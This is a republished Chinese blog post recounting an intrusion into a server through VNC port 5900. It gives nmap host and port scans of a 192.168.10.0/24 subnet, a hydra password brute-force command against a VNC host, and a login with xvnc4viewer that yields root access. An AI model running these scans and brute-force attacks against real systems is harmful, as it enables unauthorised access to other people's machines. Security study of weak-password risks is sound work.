內網滲透-記一次5900端口弱口令爆破及入侵服務器


5900端口是遠程控制軟件vnc的默認監聽端口。

1、收集IP信息:

(1)獲取內網IP地址段,使用ping 內網系統的域名,得到內網IP地址段:

2)使用: nmap -sP 192.168.10.0/24 網段內活着的IP地址:發現活着的IP主機有256個,即192.168.10.0-192.168.10.255

  nmap具體使用方法可以參考: https://www.cnblogs.com/justn0w/articles/10177612.

2、掃描開放5900端口的IP:

(1)將收集到的活着的ip放到一個txt文件夾中,利用:nmap -iL ip.txt 進行批量掃描端口;

(2)使用:nmap -PR -oN /home/xh/shentou/out.log 192.168.10.0/24 直接 掃描一個網段內所有的iP,掃描的結果會保存在out.log里面;

3.在kali機器中,使用hydra工具進行弱口令爆破:

 hydra的使用參考:https://blog.csdn.net/u012206617/article/details/86306358

(1)  hydra -P /home/xh/shentou/pwd_ssh1.txt -e n -t 1 192.168.10.13 vnc -V

-P,指定密碼列表
-e,嘗試null和相同(與用戶名相同)密碼
-t,以指定要運行的parralel進程的數量
-v,用於詳細
停止檢查相同的密碼,-en

 

 4.使用xvnc4viewer工具連接服務上的5900端口:

(1)安裝xvnc4viewer:xvnc4viewer是個沒有圖形界面的程序,Ubunut安裝的方法:~$ sudo apt install xvnc4viewer

(2)使用xvnc4viewer連接5900端口:
安裝完使用:在命令行輸入xvnc4viewer命令后在Server :處會要求輸入遠程服務器的IP地址和對應的端口號,如果不輸入端口號默認連接5900,輸入后回車,接下來會要求輸入遠程服務器的VNC登錄密碼,正確輸入密碼后會從新彈出一個圖形登錄界面。
 

 

 可以看到已經入侵到服務內部了,而且還是root權限。

參考:https://www.cnblogs.com/pipci/p/9836145.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM